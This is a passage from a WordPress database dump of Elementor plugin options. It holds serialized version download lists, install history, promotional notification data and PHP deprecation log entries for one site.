ip\";s:11:\"3.35.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-dev2.zip\";s:11:\"3.35.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-dev3.zip\";s:11:\"3.35.0-dev4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.35.0-dev4.zip\";s:6:\"3.35.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.1.zip\";s:6:\"3.35.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.2.zip\";s:6:\"3.35.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.3.zip\";s:6:\"3.35.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.4.zip\";s:6:\"3.35.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.5.zip\";s:5:\"3.4.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.0.zip\";s:10:\"3.4.0-dev7\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.4.0-dev7.zip\";s:10:\"3.4.0-dev8\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.4.0-dev8.zip\";s:10:\"3.4.0-dev9\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.4.0-dev9.zip\";s:5:\"3.4.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.1.zip\";s:5:\"3.4.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.2.zip\";s:5:\"3.4.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.3.zip\";s:5:\"3.4.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.4.zip\";s:5:\"3.4.5\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.5.zip\";s:5:\"3.4.6\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.6.zip\";s:5:\"3.4.7\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.7.zip\";s:5:\"3.4.8\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.4.8.zip\";s:5:\"3.5.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.0.zip\";s:11:\"3.5.0-beta1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta1.zip\";s:11:\"3.5.0-beta2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta2.zip\";s:11:\"3.5.0-beta3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta3.zip\";s:11:\"3.5.0-beta4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta4.zip\";s:11:\"3.5.0-beta5\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta5.zip\";s:11:\"3.5.0-beta7\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta7.zip\";s:11:\"3.5.0-beta8\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-beta8.zip\";s:10:\"3.5.0-dev8\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-dev8.zip\";s:10:\"3.5.0-dev9\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.5.0-dev9.zip\";s:5:\"3.5.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.1.zip\";s:5:\"3.5.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.2.zip\";s:5:\"3.5.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.3.zip\";s:5:\"3.5.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.4.zip\";s:5:\"3.5.5\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.5.zip\";s:5:\"3.5.6\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.5.6.zip\";s:5:\"3.6.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.0.zip\";s:11:\"3.6.0-beta1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-beta1.zip\";s:11:\"3.6.0-beta2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-beta2.zip\";s:11:\"3.6.0-beta3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-beta3.zip\";s:11:\"3.6.0-beta4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-beta4.zip\";s:11:\"3.6.0-beta5\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-beta5.zip\";s:10:\"3.6.0-dev1\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-dev1.zip\";s:11:\"3.6.0-dev10\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.6.0-dev10.zip\";s:5:\"3.6.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.1.zip\";s:5:\"3.6.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.2.zip\";s:5:\"3.6.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.3.zip\";s:5:\"3.6.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.4.zip\";s:5:\"3.6.5\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.5.zip\";s:5:\"3.6.6\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.6.zip\";s:5:\"3.6.7\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.7.zip\";s:5:\"3.6.8\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.6.8.zip\";s:5:\"3.7.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.0.zip\";s:11:\"3.7.0-beta1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.7.0-beta1.zip\";s:11:\"3.7.0-beta2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.7.0-beta2.zip\";s:11:\"3.7.0-beta3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.7.0-beta3.zip\";s:11:\"3.7.0-beta4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.7.0-beta4.zip\";s:10:\"3.7.0-dev1\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.7.0-dev1.zip\";s:5:\"3.7.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.1.zip\";s:5:\"3.7.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.2.zip\";s:5:\"3.7.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.3.zip\";s:5:\"3.7.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.4.zip\";s:5:\"3.7.5\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.5.zip\";s:5:\"3.7.6\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.6.zip\";s:5:\"3.7.7\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.7.zip\";s:5:\"3.7.8\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.7.8.zip\";s:5:\"3.8.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.8.0.zip\";s:11:\"3.8.0-beta1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.8.0-beta1.zip\";s:11:\"3.8.0-beta2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.8.0-beta2.zip\";s:11:\"3.8.0-beta3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.8.0-beta3.zip\";s:5:\"3.8.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.8.1.zip\";s:5:\"3.9.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.9.0.zip\";s:5:\"3.9.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.9.1.zip\";s:5:\"3.9.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.9.2.zip\";s:5:\"trunk\";s:52:\"https://downloads.wordpress.org/plugin/elementor.zip\";}s:14:\"business_model\";s:10:\"commercial\";s:14:\"repository_url\";s:0:\"\";s:22:\"commercial_support_url\";s:94:\"https://elementor.com/support/?utm_source=wp-repo&utm_medium=link&utm_campaign=premium-support\";s:11:\"donate_link\";s:0:\"\";s:7:\"banners\";a:2:{s:3:\"low\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=3443226\";s:4:\"high\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=3443226\";}s:5:\"icons\";a:2:{s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.gif?rev=3444228\";s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.gif?rev=3444228\";}s:12:\"preview_link\";s:0:\"\";s:4:\"Name\";s:63:\"Elementor Website Builder – More Than Just a Page Builder\";}}','off'),(951,'elementor_active_kit','7','auto'),(952,'elementor_font_display','swap','auto'),(955,'recently_activated','a:0:{}','off'),(956,'elementor_landing_pages_activation','0','auto'),(957,'elementor_checklist','{\"last_opened_timestamp\":1761050795,\"first_closed_checklist_in_editor\":false,\"is_popup_minimized\":false,\"steps\":{\"add_logo\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"set_fonts_and_colors\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"create_pages\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"setup_header\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"assign_homepage\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"setup_header_pro\":{\"is_marked_completed\":false,\"is_immutable_completed\":false}},\"should_open_in_editor\":false}','auto'),(958,'elementor_version','4.2.4','auto'),(959,'elementor_install_history','a:12:{s:6:\"3.32.4\";i:1761045309;s:6:\"3.32.5\";i:1761119311;s:6:\"3.33.0\";i:1763361346;s:6:\"3.33.2\";i:1764651642;s:6:\"3.33.4\";i:1765867096;s:6:\"3.35.5\";i:1771807396;s:5:\"4.1.4\";i:1782985266;s:5:\"4.1.5\";i:1784184410;s:5:\"4.2.1\";i:1786183352;s:5:\"4.2.2\";i:1786539089;s:5:\"4.2.3\";i:1787379400;s:5:\"4.2.4\";i:1788448212;}','auto'),(960,'elementor_events_db_version','1.0.0','off'),(962,'elementor_onboarded','1','auto'),(963,'_elementor_onboarding_features','a:2:{s:9:\"essential\";a:0:{}s:8:\"advanced\";a:0:{}}','auto'),(964,'e_editor_counter','57','auto'),(965,'_elementor_installed_time','1761045348','auto'),(968,'_elementor_free_to_pro_upsell','a:2:{s:7:\"timeout\";i:1784288952;s:5:\"value\";s:723:\"[{\"id\":\"animated_headline\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/animated_headline.jpg\"},{\"id\":\"video_playlist\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/video_playlist.jpg\"},{\"id\":\"cta\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/cta.jpg\"},{\"id\":\"testimonial_widget\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/testimonial_widget.jpg\"},{\"id\":\"image_carousel\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/image_carousel.jpg\"},{\"id\":\"connect-pro-upgrade\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/connect-pro-upgrade.jpg\"}]\";}','off'),(969,'_elementor_notifications_data','a:2:{s:7:\"timeout\";i:1784328552;s:5:\"value\";s:12640:\"[{\"id\":\"angie-super-community\",\"title\":\"Angie Community Library\",\"description\":\"Browse a library of snippets and widgets built by other Angie users, import any of them into your site, without consuming any credits or remix them with a prompt to match your brief. Every snippet is vetted by the Elementor team. You can also submit your own work for the community to discover.\",\"topic\":\"Angie\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/angie-community.png\",\"chipTags\":[\"Angie\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-angie-community\\/\",\"readMoreText\":\"Browse library\"},{\"id\":\"4.1-atomic-form\",\"title\":\"Generate Atomic Forms\",\"description\":\"Ask Angie to generate forms for lead generation, contact, bookings, promotions and more. Use the new atomic form elements like date picker, radio button, and file upoad.\",\"topic\":\"Atomic Editor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/41-atomic-form-angie.png\",\"chipTags\":[\"Angie\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.1-blog\\/\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"elementor-pro\\/elementor-pro.php\"}]]},{\"id\":\"4.1-atomic-form\",\"title\":\"Generate Atomic Forms\",\"description\":\"Ask Angie to generate forms for lead generation, contact, bookings, promotions and more. Use the new atomic form elements like date picker, radio button, and file upoad.\",\"topic\":\"Atomic Editor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/41-atomic-form-angie.png\",\"chipPlan\":\"Pro\",\"chipTags\":[\"Angie\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.1-blog\\/\",\"readMoreText\":\"Learn more\",\"cta\":\"Upgrade now\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.1-atomic-form\\/\"},{\"id\":\"cookie-consent-launch\",\"title\":\"Introducing Cookie Consent\",\"description\":\"Add a cookie consent banner to your site in minutes. Scan for cookies, manage scripts based on visitor consent, and customize the banner to match your site, or design it in the Editor with Elementor Popups. Free to get started, with more features in Elementor One.\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/cookie-launch.png\",\"chipTags\":[\"New feature\"],\"cta\":\"Get Cookie Consent\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/cookie-consent-in-editor-whats-new\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"cookiez\\/cookiez.php\",\"operator\":\"!=\"}]]},{\"id\":\"angie-super-admin\",\"title\":\"Super Admin Mode\",\"description\":\"Revolutionize your WordPress workflow with Super Admin Mode. Perform root-level WordPress operations through natural language - bulk post and product updates, PHP error diagnosis, and more.\",\"topic\":\"Angie\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/angie-super-admin.png\",\"chipTags\":[\"Angie\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-angie-super-admin\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"4.0-default\",\"title\":\"The new default\",\"description\":\"New sites now start with version 4.0 and atomic features enabled by default. Existing sites can choose to manually activate. Nothing happens to your existing layouts and sites.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/4.0-default.png\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.0-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"angie-revisions\",\"title\":\"Restore snippets precisely with Revisions\",\"description\":\"Restore any previous version of your snippets to its exact saved state. Each time you revise, Angie preserves a complete snapshot of the snippet\'s code, structure, and configuration. Open version history, select any saved state, and return to it in one click.\",\"topic\":\"Angie\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/angie-notification-revision.png\",\"chipTags\":[\"Angie\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-angie-revisions\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"4.0-atomic-forms\",\"title\":\"Atomic Forms\",\"description\":\"Build forms as part of your layout, not separate widgets. Create flexible, multi-column designs, nest elements freely, and maintain full control with the same atomic system and styling logic.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/4.0-atomic-form.png\",\"chipPlan\":\"Pro\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.0-blog\\/\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"elementor-pro\\/elementor-pro.php\"}]]},{\"id\":\"4.0-atomic-forms\",\"title\":\"Atomic Forms\",\"description\":\"Build forms as part of your layout, not separate widgets. Create flexible, multi-column designs, nest elements freely, and maintain full control with the same atomic system and styling logic.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/3.33-custom-css.png\",\"chipTags\":[\"Atomic Editor\"],\"cta\":\"Upgrade\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.0-atomic-forms\\/\"},{\"id\":\"angie-cloud-library\",\"title\":\"Introducing Angie Cloud Library\",\"description\":\"Your Angie snippets are now available across every site you manage. Save any asset you build to your account and pull it into a new project in a few clicks, fully editable and ready to adapt. Available to all users with free daily credits.\",\"topic\":\"Angie\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/angie-cloud-library.png\",\"chipTags\":[\"Angie\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-angie-cloud-library\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"4.0-interactions\",\"title\":\"Pro Interactions\",\"description\":\"Create advanced, lightweight motion inside the Editor. Define behavior visually, keep everything system-based, and deliver engaging experiences without bloated scripts or external tools.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/4.0-interactions.png\",\"chipPlan\":\"Pro\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.0-blog\\/\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"elementor-pro\\/elementor-pro.php\"}]]},{\"id\":\"4.0-interactions\",\"title\":\"Pro Interactions\",\"description\":\"Create advanced, lightweight motion inside the Editor. Define behavior visually, keep everything system-based, and deliver engaging experiences without bloated scripts or external tools.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/4.0-interactions.png\",\"chipTags\":[\"Atomic Editor\"],\"cta\":\"Upgrade\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.0-interactions\\/\"},{\"id\":\"4.0-sync-design-system\",\"title\":\"Sync and share design systems\",\"description\":\"Export and import Variables and Classes between sites, and sync them with v3 Global Styles. Maintain a consistent design system across projects and across versions.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/4.0-sync-design-system.png\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-4.0-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"angie-launch\",\"title\":\"Introducing Angie Code.\",\"description\":\"Create custom Elementor widgets, and snippets for custom site functionality from a simple description. Built natively for WordPress, and Elementor. Preview safely, refine through conversation, and publish when ready.\",\"topic\":\"Angie Code\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/angie-launch.png\",\"chipTags\":[\"New launch\"],\"link\":\"https:\\/\\/go.elementor.com\\/ai-notification-angie-launch\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"partner-program\",\"title\":\"Partner with Elementor. Grow your business.\",\"description\":\"Join to unlock exclusive access, secure visibility, benefit from marketing opportunities, and create additional revenue from the work you have already done. Join for free and start benefiting!\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/notification-partner.png\",\"chipTags\":[\"Partner Program\"],\"cta\":\"Apply now\",\"ctaLink\":\"https:\\/\\/my.elementor.com\\/agency\\/\"},{\"id\":\"manage-launch\",\"title\":\"Introducing Manage\",\"description\":\"Monitor, optimize and maintain all your sites from one centralized dashboard. Track performance, perform bulk updates and detect security risks to stay ahead of issues.\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/manage.png\",\"chipTags\":[\"New Launch\"],\"cta\":\"Start free\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/manage\\/whatsnew\"},{\"id\":\"components-3.35\",\"title\":\"Components\",\"description\":\"Build modular, reusable sections that update everywhere and decide how much control to give away to your team or clients.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/components-3-35.png\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-components-3.35-blog\",\"readMoreText\":\"Learn More\"},{\"id\":\"one-launch\",\"title\":\"Introducing Elementor One\",\"description\":\"The complete website building experience. All the tools to create, optimize, and manage websites, unified under one roof.\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/one-launch.png\",\"chipTags\":[\"New Launch\"],\"cta\":\"Explore Elementor One\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/launch-whats-new\"},{\"id\":\"atomic-tabs-3.34\",\"title\":\"Atomic Tabs\",\"description\":\"Nest any type of content inside tab triggers or content panels, unlocking a truly atomic way of design.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/tabs-3.34.png\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.34-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"variables-manager-3.33\",\"title\":\"Variables Manager\",\"description\":\"Centralize and control all your color, typography, and size tokens for consistent, scalable design systems.\",\"topic\":\"Version 4.0\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/3.33-variables-manager.png\",\"chipTags\":[\"Atomic Editor\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.33-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"ally-assistant\",\"title\":\"New! Fix accessibility issues with Ally Assistant\",\"description\":\"Scan any page for accessibility issues and fix them in one click. From color contrast to missing alt text, Ally Assistant provides guided steps or AI-powered fixes to make your site more inclusive.\",\"topic\":\"Ally by Elementor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/ally-assistant.png\",\"chipTags\":[\"New Feature\"],\"cta\":\"Scan for free\",\"ctaLink\":\"http:\\/\\/go.elementor.com\\/acc-assistant-launch-whats-new\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"pojo-accessibility\\/pojo-accessibility.php\"}]]},{\"id\":\"image-optimizer-3.19\",\"title\":\"Effortlessly optimize images for a stunning, high-speed website with the Image Optimizer plugin.\",\"description\":\"Image Optimizer perfectly balances between image quality and performance to boost your website. Resize, compress, and convert images to WebP, for faster loading times and and better user experience.\",\"topic\":\"Image Optimizer Plugin by Elementor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/image-optimizer-3.19.png\",\"chipTags\":[\"New plugin\"],\"cta\":\"Get the Image Optimizer\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/io-notification-wp-dash-learn-more\\/\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"image-optimization\\/image-optimization.php\"}]]},{\"id\":\"5-star-rating-prompt\",\"title\":\"Love the New Features? Let Us Know with 5 Stars!\",\"description\":\"Help spread the word by telling the world what you love about Elementor.\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/5-star-rating-prompt.png\",\"cta\":\"Leave a Review\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/wp-dash-notification-five-stars\\/\"},{\"id\":\"site-mailer-introducing\",\"title\":\"Introducing Site Mailer\",\"description\":\"Keep your WordPress emails out of the spam folder with improved deliverability and an easy setup\\u2014no need for an SMTP plugin or complicated configurations.\",\"topic\":\"Site Mailer Plugin by Elementor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/Site-mailer.png\",\"chipTags\":[\"New plugin\"],\"cta\":\"Start Free Trial\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/sm-wp-dash-whatsnew\\/\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"site-mailer\\/site-mailer.php\"}]]}]\";}','off'),(972,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:43:\"Introducing Angie: Agentic AI for WordPress\";s:7:\"excerpt\";s:365:\"Meet Angie, agentic AI purpose-built for WordPress. Angie understands your site, connects to your tools, and takes real actions on your behalf. Its first capability, Angie Code, lets you describe any WordPress feature you can imagine and have it built for you in minutes. Production-ready, fully integrated with your site, and safe to test before it ever goes live.\";s:7:\"created\";i:1774270910;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:142:\"https://elementor.com/blog/introducing-angie-agentic-ai-for-wordpress/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:59:\"The atomic foundation of version 4 is ready for real sites!\";s:7:\"excerpt\";s:296:\"The alpha phase is complete. Version 4 is now in beta, and the atomic foundation is ready to be used on real sites! This is the final step before the official release of version 4.0, activating the new features automatically on new sites, and becoming the default editing experience in Elementor.\";s:7:\"created\";i:1770651621;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:113:\"https://elementor.com/blog/editor-4-beta/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:79:\"Introducing Elementor 3.33: Variables Manager, Custom CSS, Blend Modes, & more!\";s:7:\"excerpt\";s:340:\"Elementor 3.33 builds on the foundation of Editor V4, continuing our mission to create a faster, more scalable, and more intuitive design experience for Web Creators. With the addition of the Variables Manager, element-level Custom CSS, Background Clipping, and Blend Modes, designers have more creative precision and consistency than ever.\";s:7:\"created\";i:1762944115;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:145:\"https://elementor.com/blog/elementor-333-v4-variables-manager-custom-css/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','off'),(1093,'elementor_pro_version','3.32.3','auto'),(1094,'elementor_pro_install_history','a:1:{s:6:\"3.32.3\";i:1761119254;}','auto'),(1095,'widget_elementor-library','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),(1096,'_elementor_pro_installed_time','1761119254','auto'),(1097,'elementor_submissions_db_version','5','auto'),(1099,'_elementor_pro_api_requests_lock','a:2:{s:11:\"get_version\";i:1788448261;s:16:\"get_license_data\";i:1788447984;}','auto'),(1103,'elementor_log','a:43:{s:32:\"ce7823c453a97417f689c454c38fee45\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2025-12-23 11:31:57\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:169:\"ElementorPro\\Core\\Database\\Query_Builder::when(): Implicitly marking parameter $false_callback as nullable is deprecated, the explicit nullable type must be used instead\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:7;s:14:\"\0*\0times_dates\";a:7:{i:0;s:19:\"2025-12-23 11:31:57\";i:1;s:19:\"2026-01-12 11:16:21\";i:2;s:19:\"2026-01-19 11:22:08\";i:3;s:19:\"2026-01-21 11:18:43\";i:4;s:19:\"2026-01-26 11:17:17\";i:5;s:19:\"2026-01-31 11:14:10\";i:6;s:19:\"2026-02-03 11:15:00\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:169:\"ElementorPro\\Core\\Database\\Query_Builder::when(): Implicitly marking parameter $false_callback as nullable is deprecated, the explicit nullable type must be used instead\";s:4:\"file\";s:106:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/query-builder.php\";s:4:\"line\";i:268;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:106:\"/home/websng05/public_html/megabet333.biz/wp-content/plugins/elementor-pro/core/database/query-builder.php\";s:7:\"\0*\0line\";i:268;}s:32:\"1ced78740e6ce6f2d54a7dd9aed100b9\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2026-01-07 11:02:07\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:192:\"ElementorPro\\Modules\\Notes\\Database\\Query\\Note_Query_Builder::__construct(): Implicitly marking parameter $connection as nullable is deprecated, the explicit nullable type must be used 